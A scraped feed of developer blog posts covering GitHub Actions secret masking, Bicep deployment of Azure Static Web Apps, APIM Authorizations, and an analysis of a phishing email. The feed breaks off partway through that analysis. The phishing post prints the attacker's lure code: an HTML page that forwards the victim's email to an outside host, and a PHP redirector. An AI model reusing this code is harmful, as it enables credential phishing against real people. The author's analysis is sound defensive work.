The rule of thumb is that you can never have enough power points, and even when you’ve put them all in, they’ll still not be enough.\nFor the main points in our house, behind the TV’s, I put 4-plug wall plates, which will give enough to do direct plugging in for most appliances, but you can always expand with power boards as needed. For example, our media room had power for the TV, Xbox and Xbox controller charger, which leaves one left over for a soundbar (or similar) in the future, before having to put in an expander (we also have an additional 2 points elsewhere for the recliners 😉).\nWe have some oddities in some rooms though, like our laundry has a heap of single power points, rather than doubles, so I’ll have to review that down the track when laundry is the space to make smart.\nSummary This brings me to the end of the first post in this series.\nComing into this project with a from-scratch house build has made it a lot easier for me to design for what I want, rather than having to retrofit into the house.\nI really think that the most important aspect is approaching a smart home from the human perspective is important. Making it “smart” by just throwing tech in the house will run the risk of breaking expectations that people will have on how things work. No one wants to live with a Norman Door every day.\nSo, think through your connectivity, think through your power requirements, but most importantly, think through the people who will use the house and design for them.\n", "id": "2022-07-18-building-a-smart-home---part-1-design" }, { "title": "Working With add-mask and GitHub Actions for dynamic secrets", "url": "https://www.aaron-powell.com/posts/2022-07-14-working-with-add-mask-and-github-actions/", "date": "Thu, 14 Jul 2022 01:00:33 +0000", "tags": [ "devops" ], "description": "This took a lot of chasing down to work out, so hopefully I can save you some time", "content": "I’ve been doing an overhaul of the GitHub Actions workflow that power my blog, which I’ll write a separate post about, but on of the new steps I’ve added is an Azure CLI command that gets the SWA deployment token, rather than having it set as a secret in the GitHub repo.\nSo the steps of the workflow are 1. make a call to get the token, 2. set it as an environment variable (you could use a step output if preferred), and 3. provide it to the SWA deployment action.\nBut the problem is, environment variables aren’t secret in the logs, meaning your logs will end up something like this:\nRun Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: 3c0399e8e4f1456f8249ce89209946c7c6a3fa79a3acf6c17236b9cbb7b1dc54-<snipped for blog post> repo_token: *** action: upload skip_app_build: true skip_api_build: true app_location: .output api_location: .output-api env: OUTPUT_FOLDER: .output DOTNET_VERSION: 6.x AZURE_HTTP_USER_AGENT: AZUREPS_HOST_ENVIRONMENT: SWA_DEPLOYMENT_TOKEN: 3c0399e8e4f1456f8249ce89209946c7c6a3fa79a3acf6c17236b9cbb7b1dc54-<snipped for blog post> Yeah, that happened to me, and yes, the logs did contain the active deployment token for my blog (it’s been regenerated now for those who want to do naughty things!).\nWhoops!\nThis is an easy mistake to make, you have a step that’s connecting to a service securely to get something else to pass on that’s meant to be secret but it’s inadvertently leaked via your logs. 
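To make the failure mode concrete, here is a minimal sketch of the kind of step that causes it (the real step from my workflow appears later in the post; the app name here is illustrative):

```yaml
- name: Get SWA deployment token
  run: |
    # Anything appended to $GITHUB_ENV is plain text to the runner, so any later
    # step that prints its env block (as the SWA deploy action does) logs the token
    echo "SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n my-swa-app -o tsv --query properties.apiKey)" >> $GITHUB_ENV
```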
So, how do we address that?\nThe add-mask workflow command GitHub Actions has a set of workflow commands that can be used for a variety of things, such as set-output for outputting from a script.\nBut for our use-case, we want to use the add-mask command, and I’ll admit that I found it a little confusing.\nHow add-mask works My mistake was that I assumed that add-mask worked like set-output, only it would make something a “secret” in the logs, but that’s not correct.\nThe way add-mask works is that it takes a value and from that point onwards when that value is to be written to the logs, it’ll be masked. And this is the important point to note, masking will only be applied to log messages after it is used, so you need to ensure it’s used as early as possible, relative to the usage of the value you wish to mask.\nUsing add-mask Here’s a basic workflow that uses add-mask:\n1 2 3 4 5 6 7 8 9 10 11 12 13 on: workflow_dispatch: push: branches: - main jobs: masking: runs-on: ubuntu-latest steps: - run: | echo '::add-mask::test' echo This is a test And here’s the raw output from that workflow run (I’ve truncated to just the job run):\n2022-07-14T01:27:14.0104402Z ##[group]Run echo '::add-mask::test' 2022-07-14T01:27:14.0104910Z [36;1mecho '::add-mask::test'[0m 2022-07-14T01:27:14.0105274Z [36;1mecho This is a test[0m 2022-07-14T01:27:14.0906476Z shell: /usr/bin/bash -e {0} 2022-07-14T01:27:14.0907141Z ##[endgroup] 2022-07-14T01:27:14.1473068Z This is a *** 2022-07-14T01:27:14.1729814Z Cleaning up orphan processes Notice the second last line, where it says This is a ***? that’s happened because we’ve used add-mask to mask ever time the work test appears in our log, but you will see that it doesn’t mask it in the first 3 lines, because at that point, the mask hasn’t yet been applied, so it doesn’t know to mask there (the first three lines are the logs dumping out the script that’s going to be run before it’s run).\nThat is a little bothersome, but realistically, you’re unlikely to have a hard-coded string in the workflow file that you want to mask in logs, after all, if it’s hard-coded in the workflow, then it’s already publicly visible, masking in logs won’t solve anything. 
Instead, you’re more likely to mask something that is computed, or retrieved from elsewhere.\nMasking the SWA deployment token Let’s go back to the problem I originally had, I need to mask the deployment token I get from the Azure CLI.\nHere’s the original step in the workflow:\n1 2 3 4 5 - name: Get SWA deployment token uses: azure/CLI@v1 with: inlineScript: | echo SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n ${{ secrets.SWA_NAME }} -o tsv --query properties.apiKey) >> $GITHUB_ENV We’re generating an environment variable assigned to the az staticwebapps secrets list call, so this step won’t leak it to our logs, just every subsequent step, since this is an environment variable (again, I should probably use a step output, and maybe I will after writing this post…).\nSince we can capture the token in a way that won’t log, all we need to do now is provide that to add-mask, so let’s update this step:\n1 2 3 4 5 6 7 - name: Get SWA deployment token uses: azure/CLI@v1 with: inlineScript: | SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n ${{ secrets.SWA_NAME }} -o tsv --query properties.apiKey) echo "::add-mask::$SWA_DEPLOYMENT_TOKEN" echo SWA_DEPLOYMENT_TOKEN=$SWA_DEPLOYMENT_TOKEN >> $GITHUB_ENV Now what we’re doing is splitting this down a bit more finely than before and we:\nCapture the token as a variable within this script Provide it to the add-mask call Push it out as an environment variable for the following steps When this step is hit in the logs, we’ll see the following:\nRun azure/CLI@v1 with: inlineScript: SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n *** -o tsv --query properties.apiKey) echo "::add-mask::$SWA_DEPLOYMENT_TOKEN" echo SWA_DEPLOYMENT_TOKEN=$SWA_DEPLOYMENT_TOKEN >> $GITHUB_ENV Since the script hasn’t been evaluated yet, the add-mask line shows it will use a variable, but not the value of that variable. Then the script is run and add-mask is applied so that when subsequent steps are executed, the logs now look like this:\nRun Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: *** repo_token: *** action: upload skip_app_build: true skip_api_build: true app_location: .output api_location: .output-api env: OUTPUT_FOLDER: .output DOTNET_VERSION: 6.x AZURE_HTTP_USER_AGENT: AZUREPS_HOST_ENVIRONMENT: SWA_DEPLOYMENT_TOKEN: *** Success! Our deployment token is no longer visible to anyone via our logs.\nConclusion Leaking credentials via log files is something that is really easy to accidentally do - I’ve been doing this with my SWA deployment token for a few weeks now and thankfully no one noticed. 
While being able to deploy new files to my blog might not be the end of the world, this is the sort of thing that can leave a company exposed without them even realising it.\nGitHub providing the add-mask workflow command is really useful to do on-the-fly sanitisation of your log files, but it’s a little confusing on how you would use it, so remember, add-mask takes a value that you want to mask, it’s not for creating new outputs/environment variables/etc., and the masking is only applied for log entries that appear after the add-mask command is executed, so execute it as early as you can.\n", "id": "2022-07-14-working-with-add-mask-and-github-actions" }, { "title": "Deploy Azure Static Web Apps With Bicep", "url": "https://www.aaron-powell.com/posts/2022-06-29-deploy-swa-with-bicep/", "date": "Wed, 29 Jun 2022 00:41:50 +0000", "tags": [ "azure", "devops" ], "description": "I'm trying to get better at using Infrastructure as Code, so first up - deployments with SWA!", "content": "In an effort to constantly tinker with things that probably don’t need to be tinkered with, I’ve decided that it’s time to do an upgrade to my CI/CD pipeline so that I can use Bicep to deploy Azure Static Web Apps (I’m also using this as a way to learn more about Bicep as well).\nBecause I’m using VS Code I’ve gone ahead and installed the Bicep Extension so that I get some nice syntax highlighting in the editor.\nWriting Bicep With the editor ready, let’s write some Bicep! Create a new file named swa.bicep and paste the following code into it:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 param name string @allowed([ 'centralus', 'eastus2', 'eastasia', 'westeurope', 'westus2' ]) param location string @allowed([ 'Free', 'Standard' ]) param sku string = 'Standard' resource swa_resource 'Microsoft.Web/staticSites@2021-01-15' = { name: name location: location tags: null properties: {} sku: { name: sku size: sku } } This is about as simple as you can get when it comes to deploying SWA with Bicep, as it’s not deploying a backend service, but rather a static website.\nFirst up, there’s three parameters defined, the name of the SWA instance, the location and what sku to use (and the sku is defaulted to Standard). There’s also an allow-list of values for location and sku, since they have some restrictions on them and this will reduce the possibility of invalid values.\nThen we define the resource that we’re deploying with the symbolic-name swa_resource (that we could use elsewhere if required) and the resource name plus the version.\nThis is the minimum fields that you need to provide to Bicep for defining the resource, with tags and properties essentially ignores in ours, but you need to include them or the deployment will fail with a rather obscure error message. 
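Before wiring this into a pipeline, you can sanity-check the template straight from the Azure CLI; a minimal sketch, assuming the file is saved as swa.bicep and a resource group called my-rg already exists:

```bash
# The CLI transpiles Bicep to ARM on the fly, so this deploys swa.bicep directly
az deployment group create \
  --resource-group my-rg \
  --template-file swa.bicep \
  --parameters name=my-swa-app location=eastus2
```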
The tags property is pretty straight forward, but let’s talk about properties for a bit.\nUnderstanding properties in our Bicep file For my use-case, I’ve got a highly customised deployment pipeline, and as such, I’m essentially just uploading a pre-built application to SWA, but that’s not the most common approach, instead, you’re more likely wanting to get the resource configured for deployment as part of the Bicep template, and we control that with the properties section.\nHere’s a more expanded definition, adapted from the Bicep docs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 properties: { branch: 'string' buildProperties: { apiBuildCommand: 'string' apiLocation: 'string' appArtifactLocation: 'string' appBuildCommand: 'string' appLocation: 'string' githubActionSecretNameOverride: 'string' outputLocation: 'string' skipGithubActionWorkflowGeneration: bool } provider: 'string' repositoryToken: 'string' repositoryUrl: 'string' } Including values for this will instruct Azure to provision the GitHub Actions workflow for you, and you can use the branch and repositoryUrl to specify what to build, and the other options will configure how it’s built (where the app and API are in the repo, etc.), so I could have set it like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 resource swa_resource 'Microsoft.Web/staticSites@2021-01-15' = { name: name location: location tags: null properties: { branch: 'main', repositoryToken: tokenParam, repositoryUrl: 'https://github.com/aaronpowell/aaronpowell.github.io', buildProperties: { appLocation: './', apiLocation: './api', outputLocation: './output' } } sku: { name: sku size: sku } } (That’s not entirely reflective of my repo setup as it’s highly customised, but it gives an overview.)\nModularlising the Bicep file The swa.bicep file is really all we need, but let’s put some good practices in place and modularise it so that if we want to add other services in the future, we can do that without too much hassle. 
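The end state of this section is a small deploy folder, which is the path the GitHub Actions step further down points at:

```
deploy/
├── main.bicep   # entrypoint that wires the modules together
└── swa.bicep    # the Static Web App module from above
```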
For this, create another file, main.bicep, which will be our entrypoint:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 param location string = resourceGroup().location param swaName string @allowed([ 'Free', 'Standard' ]) param swaSku string = 'Free' module staticWebApp 'swa.bicep' = { name: '${deployment().name}--swa' params: { location: location sku: swaSku name: swaName } } We’ve got the same set of params defined as the other file, with the only difference being the location is being derived from the resource group that we’re deploying to using the resourceGroup() function.\nTo call the swa.bicep file, we’re defining it as a module and passing in the param values that it needs, and giving it a dynamically generated name.\nWith the files setup, it’s time to use them from GitHub Actions.\nDeploying with GitHub Actions Since Bicep is a DSL over ARM (Azure Resource Manager), we can use the azure/arm-deploy GitHub Action to deploy it as well, since the Action will determine if we’re deploying a Bicep or ARM file.\nBut before we can deploy that, we’re going to need to log into Azure, which we can do with the azure/login Action:\n1 2 3 4 5 6 - name: Azure Login uses: azure/login@v1 with: client-id: ${{ secrets.AZURE_CLIENT_ID }} tenant-id: ${{ secrets.AZURE_TENANT_ID }} subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} There’s different ways that you can provide credentials to Azure for the Action to authenticate with, my preference is to use the OIDC Connect method as its setup is the most straight forward to me.\nNote: Changing the permissions of the GITHUB_TOKEN is required but it may cause an unexpected side effect that PR comments won’t work. Check out this post for how to address it.\nFollow the guide on setting up via Portal, CLI or PowerShell, I prefer Azure CLI myself:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 app=$(az ad app create --display-name blog-deployer -o json) appId=$(echo $app | jq -r '.appId') objectId=$(echo $app | jq -r '.id') sp=$(az ad sp create --id $appId -o json) assigneeObjectId=$(echo $sp | jq -r '.id') subscriptionId=... resourceGroupName=... az role assignment create --role contributor --subscription $subscriptionId --assignee-object-id $assigneeObjectId --assignee-principal-type ServicePrincipal --scope /subscriptions/$subscriptionId/resourceGroups/$resourceGroupName credentialName=github-deploy subject=repo:aaronpowell/aaronpowell.github.io:environment:production az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body "{\\"name\\":\\"$credentialName\\",\\"issuer\\":\\"https://token.actions.githubusercontent.com\\",\\"subject\\":\\"repo:organization/repository:environment:production\\",\\"description\\":\\"Deploy from GitHub Actions\\",\\"audiences\\":[\\"api://AzureADTokenExchange\\"]}" echo Values for GitHub secrets: echo Client ID: $appId echo Tenant ID: $(echo $sp | jq -r '.appOwnerOrganizationId') echo Subscription ID: $subscriptionId This script will go through the steps to create the app in Azure AD, setup a Service Principal and then provision the identity to talk to GitHub, before dumping out the three bits of information you’ll need to authenticate the Action with.\nYou’ll need to provide the right subscriptionId and resourceGroupName, and the only other value you may wish to change is subject. For this pipeline, we’ll use GitHub Environments to deploy, which is denoted by environment:<environment name>, where environment name is production. 
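For that subject to line up at deploy time, the job doing the deployment needs to declare the environment (and the OIDC token permission); a minimal sketch, with the job name being illustrative:

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    # Must match the environment named in the federated credential subject
    environment: production
    permissions:
      id-token: write # needed for the OIDC exchange
      contents: read
    steps:
      - uses: actions/checkout@v3
      # the azure/login step above and the arm-deploy step below slot in here
```

With the subject sorted, the remaining piece is the credential itself.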
Give that a name and then call the az rest comand to create the credential (this feature is still in preview, in the future there may be a direct Azure CLI command to use).\nNow, plug the three values it outputs into GitHub secrets, so the Action can use them.\nRunning Bicep from GitHub Actions With a step for azure/login setup, the next step needs to run the Bicep template with the azure/arm-deploy Action.\n1 2 3 4 5 6 7 8 9 10 11 12 13 - name: Ensure resource group exists uses: azure/CLI@v1 with: inlineScript: | az group create -g ${{ secrets.RESOURCE_GROUP }} -l ${{ secrets.RESOURCE_GROUP_LOCATION }} - name: Deploy Bicep uses: azure/arm-deploy@v1 with: resourceGroupName: ${{ secrets.RESOURCE_GROUP }} subscriptionId: ${{ secrets.AZURE_SUBSCRIPTION_ID }} template: ./deploy/main.bicep parameters: swaName=${{ secrets.SWA_NAME }} failOnStdErr: false Well, first we’re using azure/CLI to ensure that the resource group exists, and then we’re using azure/arm-deploy to deploy the Bicep template.\nThe path to the main.bicep template is set as an argument to the Action, along with the parameters that it needs. Since we’re using default values for location and sku, we don’t need to pass those in.\nWith this added to your workflow before the action azure/static-web-apps-deploy, you now have Infrastructure as Code for deploying your static web apps.\nConclusion Throughout this post we looked at how to create a simple Bicep template that will deploy a Static Web App, and how to use it from GitHub Actions. We also saw the process for setting up the authentication from GitHub Actions to Azure, using the OIDC connect method.\nNow that this is added, we have a completely reproducable pipeline that can be used to deploy your static web apps, from resource provisioning to deployment, in the case we ever need to start from scratch again.\nYou can check this out in action by looking at the GitHub Actions for my blog which I have refactored to use Bicep (and it only took half a dozen deployments!).\n", "id": "2022-06-29-deploy-swa-with-bicep" }, { "title": "Implementing a Token Store With APIM Authorizations", "url": "https://www.aaron-powell.com/posts/2022-06-16-implementing-a-token-store-with-apim-authorizations/", "date": "Thu, 16 Jun 2022 02:05:27 +0000", "tags": [ "security", "javascript" ], "description": "Let's take a look at making OAuth2 simpler with APIM Authorizations", "content": " In this post, we’re going to take a look at the recently previewed Authorizations feature of Azure API Management (APIM) and see how to setup a React and TypeScript application that uses the Dropbox SDK to upload a file, without needing to handle OAuth token creation.\nWhat is APIM Authorizations Before we dive into creating the application, let’s quickly look at what this feature is.\nIn a connected system, being able to communicate between different Software as a Service (SaaS) platforms is a common task, but often these platforms will use OAuth2 to verify the user identity. This requires undertaking an authentication flow, which is fine if you’re directly using the system, but what if it’s being handled by a background job, like an Azure Function running with a Timer Trigger? Then we need to use alternative authentication workflows, handle expiry of tokens, etc.\nThis can result in a lot of our application code being responsible for managing and storing tokens.\nAnd this is where Authorizations comes in, it is a managed Token Store for your OAuth2 access tokens. 
Rather than your application having to authenticate, APIM will handle this on your behalf. It also means your application can operate in a lower trust environment, rather than your application needing to know about the client id/client secret of the SaaS provider, it becomes unaware and only relies on the REST API to API Management to get the token back as-needed.\nYou can learn more about Authorizations in APIM on their docs.\nCreating our app The application we’re creating is a data entry form that could be used to capture user information while at an event, a person will enter their information and it’ll generate a file to upload to Dropbox, which could later be ingested by another part of our system.\nLet’s start by generating the new application using vite:\n1 npm create vite@latest my-app -- --template react-ts Next, we’ll start creating the form that we’ll use for data capture, so open the my-app folder in VS Code (or any other editor of your choice) and we’ll add a form to the App.tsx file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 const updateField = ( updater: React.Dispatch<React.SetStateAction<UserInfo>> ) => (e: ChangeEvent<HTMLInputElement>) => updater(userInfo => ({ ...userInfo, [e.target.name]: e.target.value })); function App() { const [userInfo, setUserInfo] = useState<UserInfo>({}); const [submitting, setSubmitting] = useState(false); return ( <div className="App"> <header className="App-header"> <h1>Contoso Lead Capture</h1> <form action="" onSubmit={e => (e.preventDefault(), setSubmitting(true))} > <fieldset> <div> <label htmlFor="firstName">First name</label> <input type="text" name="firstName" id="firstName" placeholder="Aaron" value={userInfo.firstName} onChange={updateField(setUserInfo)} /> </div> <div> <label htmlFor="lastName">Last name</label> <input type="text" name="lastName" id="lastName" placeholder="Powell" value={userInfo.lastName} onChange={updateField(setUserInfo)} /> </div> </fieldset> <fieldset> <div> <label htmlFor="email">Email</label> <input type="email" id="email" name="email" placeholder="foo@email.com" value={userInfo.email} onChange={updateField(setUserInfo)} /> </div> <div> <label htmlFor="phone">Phone</label> <input type="phone" id="phone" name="phone" placeholder="555-555-555" value={userInfo.phone} onChange={updateField(setUserInfo)} /> </div> </fieldset> <fieldset> <button type="submit" disabled={ submitting || !userInfo.firstName || !userInfo.lastName || !userInfo.email || !userInfo.phone } > Submit </button> </fieldset> </form> </header> </div> ); } I’ve also brought in the useState hook so that we can set the values of the various fields as we go along and created a type the represent the data in the form (and put it in a new file called types.ts):\n1 2 3 4 5 6 export type UserInfo = { firstName?: string; lastName?: string; email?: string; phone?: string; }; Hooking up to Dropbox It’s time to hook up with Dropbox, so we’ll need their JavaScript SDK:\n1 npm install --save dropbox And we’ll put the save process in a useEffect hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const [dropboxResponse, setDropboxResponse] = useState< DropboxSaveResponse | undefined >(); useEffect(() => { async function saveToDropbox() { const accessToken = "???"; const dropbox = new 
Dropbox({ accessToken }); const contents = `${userInfo.firstName},${userInfo.lastName},${userInfo.email},${userInfo.phone}`; const path = `/submissions/${+new Date()}.csv`; const response = await dropbox.filesUpload({ path, contents }); if (response.status !== 200) { setDropboxResponse({ error: true, message: "Failed to upload to dropbox" }); return; } setDropboxResponse({ error: false, message: "Details have been saved. Start again?" }); } if (!submitting) { return; } saveToDropbox(); }, [submitting, userInfo]); I’ve also created a type called DropboxSaveResponse to set on the hook:\n1 2 3 4 export type DropboxSaveResponse = { error: boolean; message: string; }; Our code is ready, well, except for one critical part - how do we get our access token for the Dropbox SDK? Well, we could kick off a Dropbox auth flow, but now everyone has to be able to approve access to the shared Dropbox account, which isn’t ideal. Thankfully, this is exactly what APIM Authorizations is designed for.\nSetting up APIM with Authorizations We’re going to use the Azure Portal to deploy our APIM instance, but as part of the sample repo, we’ve also provided some Bicep templates, so if that’s your preferred approach, head over to the GitHub repo for that guide. Also, if you just want to get deployed, click the Deploy to Azure button below:\nNote: Please be aware this is preview so there may be some changes before the final release.\nHead over the the Azure Portal and create a new APIM instance:\nFill in the required fields and click through the other screens (there’s nothing more that we need to add to the APIM resource beyond the first screen - unless you want to configure APIM for other uses).\nNote: For the preview, you’ll need to use the Developer pricing tier.\nWhen the resource has been created, you should see a new Authorizations (preview) option under the APIs grouping:\nClick on that and we’ll see a list of previously created Authorizations, but since we haven’t got any yet, we’ll start with the Create button to provision it:\nFrom this screen, we can configure the OAuth2 service that we are going to authorize against, and you’ll see all that’s available in the Identity provider list. Since we’re using Dropbox, you’ll need to have created a Dropbox app and obtained the client id and client secret already (if you haven’t done that, head over to Dropbox and set that up).\nWhen filling out this form, note down the Provider name and Authorization name, as we’re going to need those later on.\nAlso, ensure that the Scopes you provide match that in Dropbox. Since we’re going to be uploading files we’re going to need files.metadata.write files.contents.write files.content.read, but match those to your applications needs.\nBefore going to the next screen, copy the Redirect URL and add that to the Dropbox application, so that it can authenticate on the next step:\nOn step two of the process, we need to authenticate APIM against our Dropbox application using the OAuth2 application we’ve created, so click the Login with DropBox button and follow the authorization workflow that it provides.\nThe last stage of setting up the Authorization is configuring the Access Policy the Authorization will use, you can either link this to users/groups within AAD or you can use a managed identity, such as the one provided by APIM. 
We’re going to use the managed identity:\nFrom the fly-in window select API Management service for the Managed identity and then pick your service from the listed options.\nThis will populate the main window and we can finish the setup.\nAccessing our token APIM is now acting as our Token Store, and will get new OAuth2 tokens for us as required, but we still need to access them, and for that, we’re going to create an API endpoint in API to return it. Head over to the APIs section and we’re going to manually define a HTTP API:\nThe API I’ve defined will be available at the /token route, and since we’ll be calling it from another web host, we need to configure a CORS policy. We can do that by clicking on All operations and opening the code editor for policies to replace the default with:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <policies> <inbound> <cors allow-credentials="false"> <allowed-origins> <origin>*</origin> </allowed-origins> <allowed-methods> <method>GET</method> <method>POST</method> </allowed-methods> </cors> </inbound> <backend> <forward-request /> </backend> <outbound /> <on-error /> </policies> This is defining an inbound policy that allows CORS from all origins (you might want to tighten that up in a production app!) and passes through all requests to the backend without interference.\nNow we can create an operation to the API so that we can get back the token:\nI’m calling the operation Get Dropbox token and making it a HTTP GET at the / URL, which is relative to the path of the API that we’ve defined, meaning it’s a GET request against /token.\nWith that saved, we need to define just what this API will do. Since we want to access the token store that our authorizations use, we’re going to use the get-authorization-context policy on the inbound request:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <policies> <inbound> <base /> <get-authorization-context provider-id="dropbox-demo" authorization-id="auth" context-variable-name="auth-context" ignore-error="false" identity-type="managed" /> <return-response> <set-body>@(((Authorization)context.Variables.GetValueOrDefault(&quot;auth-context&quot;))?.AccessToken)</set-body> </return-response> </inbound> <backend> <base /> </backend> <outbound> <base /> </outbound> <on-error> <base /> </on-error> </policies> The get-authorization-context policy needs two bits of information that we set when we created the Authorization initially, the name of the provider, dropbox-demo, and the name of the Authorization, auth. The policy will then call into our token store, grab the token and we set it as the body using set-body, to return in our response. This is just setting a text/plain response, but you could build up a JSON payload if that was more preferred in your scenario.\nSave the policy, click the Test tab at the top and fire off the request:\nSuccess! 
We can see in the HTTP response that the response body contains our OAuth2 token that we can can provide to the Dropbox SDK.\nHooking it all up APIM is all configured with the authorizations now so it’s time to integrate with our application.\nFrom the React application we’re going to make a call to the /token API that we created, and you can get the URL from this command:\n1 2 3 4 SUBSCRIPTION_KEY=$(az rest --method post --url /$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.ApiManagement/service/$APIM_NAME/subscriptions/master/listSecrets?api-version=2021-08-01 | jq .primaryKey -r) GATEWAY_URL=$(az apim show --name $APIM_NAME --resource-group $RESOURCE_GROUP --query gatewayUrl --output tsv) echo "$GATEWAY_URL?dropbox-demo/token?subscription-key=$SUBSCRIPTION_KEY" Note: We are going to be including the subscription key in the URL and that key will be exposed via the React app so it can call APIM, meaning you are potentially leaking secrets. In a more robust application you’d likely include an Azure Function which makes the call to Dropbox, rather than doing it in the browser, so your client would POST to Azure Functions and it in turn would retrieve the access token and upload the file. But we’re keeping it in the client for today’s demo.\nTo use this from our React application, create a .env file at the root of your workspace and add it in like so:\n1 VITE_APIM_ENDPOINT=<...> Now we can go back to our App.tsx and update this line:\n1 const accessToken = "???"; To:\n1 2 const accessTokenResponse = await fetch(import.meta.env.VITE_APIM_ENDPOINT); const accessToken = await accessTokenResponse.text(); Start the application with npm run dev, fill out the data in the form and hit submit - you’ll see a call to APIM that gets back the access token and then it’s provided to the Dropbox SDK to upload the file to Dropbox.\nConclusion There we have it, you’ve learnt about a new feature we’ve added to API Management - Authorizations.\nThroughout this post we’ve taken a look at how to setup Authorizations in APIM, in this case we’ve used Dropbox, connected APIM to our Dropbox application to it can request OAuth2 access tokens on our behalf. We then created a policy in APIM that will return the access token via an API call we can make, rather than us having to build our own API from scratch.\nWe also built a React application that can call the API we created in APIM to get back the Dropbox access token from the token store, provide it to the Dropbox SDK and then upload a file to Dropbox, all without the client having to undertake an OAuth2 flow itself.\nYou’ll find the sample of this application on GitHub, including the scripts for provisioning APIM and a Blazor/C# version. 
To learn more about the Blazor version, check out this article by my colleague Justin Yoo.\nDon’t forget to have a read of the Authorizations in API Management docs and let us know what kinds of things you would find this useful for.\n", "id": "2022-06-16-Implementing-a-Token-Store-with-APIM-Authorizations" }, { "title": "Breaking Down a Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2022-05-10-breaking-down-a-phishing-attempt/", "date": "Tue, 10 May 2022 06:56:11 +0000", "tags": [ "security" ], "description": "A look at a phishing attempt on me today", "content": "Today my wife and I received the following email from our builder:\nWell, more specifically, we received it from the sales consultant at the builder who we did the initial tender through about 2 years ago and haven’t been in contact with since.\nSo, getting an email from them seemed somewhat weird, but at the same time, we’re just about finished with our build so we thought it might be some closing paperwork.\nBut it wasn’t, it was a phishing attack, and a pretty darn impressive one at that. If you look at the email you’ll notice (redacted) email footer with disclaimer, this was all correct details, down to the mobile phone number of the individual and the text in the disclaimer, it all matches with previous emails we’d had.\nThe email came into the joint email account my wife and I share, I didn’t read it but she asked me why she couldn’t access it - she needed the password to the joint account to do so. This triggered a red flag with me so I decided to have a look at it.\nLegit on first pass What really got me about this was just how real the email looked, it’s attempting to mimic the information rights management (IRM) of M365 which allows you to share a document from our SharePoint environment to someone outside of your organisation. It works by sending them back to your M365 tenant where you have to provide an access token and your email (token is emailed separately) to then give you access to the document.\nIt’s really cool tech for allowing a company to share sensitive content to people outside of their organisation in a trusted way, and still hold onto the trust aspect, rather than just emailing attachments which you can’t track ownership of, or be sure they haven’t been intercepted in a person-in-the-middle attack.\nBut it seemed a bit off with the text in the email, Good Day, Please see attached.. This is not the best english and the use of capitalisation seems off, indicating that something isn’t quite right about it.\nTime to snoop.\nWhere’s the link go There’s a big View Message button in the middle, which you’re obviously meant to click, and this is the start of the attack. Hovering over the link it clearly wasn’t right, it was going to https://8097685657-evkpl8.codesandbox.io/?email=.\nI’m pretty confident that M365 IRM isn’t running on codesandbox.io, but let’s take a look at it anyway.\nOk, interesting, a ReCapture challenge and a submit button, that’s not that interesting. 
I popped the browser devtools and had a look around, still, nothing that interesting, but given it’s on codesandbox, we can have a look at the raw files at https://codesandbox.io/s/8097685657-evkpl8.\nDigging through the code There’s four files in the “app”, a package.json and sandbox.config.json, both of which were clearly just generated from a basic template, then there’s the index.html that we get served:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 <object data="https://contelis.com.br/wp?email=" id="obj" width="100%" height="100%" type="text/html" > Link Expired </object> <script type="text/javascript"> function getUrlVars() { var vars = {}; var parts = window.location.href.replace( /[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) { vars[key] = value; } ); return vars; } var email = window.location.hash.substr(1); if (!email) { var email = getUrlVars()["email"]; document .getElementById("obj") .setAttribute("data", "https://contelis.com.br/wp?email=" + email); } else { document .getElementById("obj") .setAttribute("data", "https://contelis.com.br/wp?email=" + email); } </script> So it’s looking at the email query string and then loading up another website in an <object> tag, which it full screens. This means that the page https://contelis.com.br/wp is really where the code lives.\nInterestingly enough, there’s also a index.php file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php $oslo=rand(); $praga=md5($oslo); $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; parse_str(parse_url($url, PHP_URL_QUERY)); $domain = explode('@', $email); $domain_check = '@'.strtolower($domain[1]); if(stripos($domain_check, '@hotmail.') !== false || stripos($domain_check, '@outlook.') !== false || stripos($domain_check, '@office365.') !== false){ header('Location: https://'.$praga.'-kve7vl.csb.app'.$email); } else { header('Location: https://'.$praga.'-kve7vl.csb.app'.$email); } ?> It’s been a long time since I’ve written PHP but my understanding of the code is that it looks at the email address, and if it’s a “microsoft” property, you get redirected to one site, otherwise you get directed to a different site, all using the Location header… although if I understand the code right, you end up at the same site regardless, and both sites seem to be on codesandbox as well, as csb.app is the short link that they use.\nFollowing that link lands you at an identical codesandbox by the same author, so I’m unsure exactly what the point of it is, my guess is that it’s only part of a file, maybe the one of contelis.com.br.\nSpeaking of page at contelis.com.br, it’s really simple HTML, all it’s doing it loading up ReCapture and interestingly enough, the actual ReCapture, not some mock up, so you can fail it!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 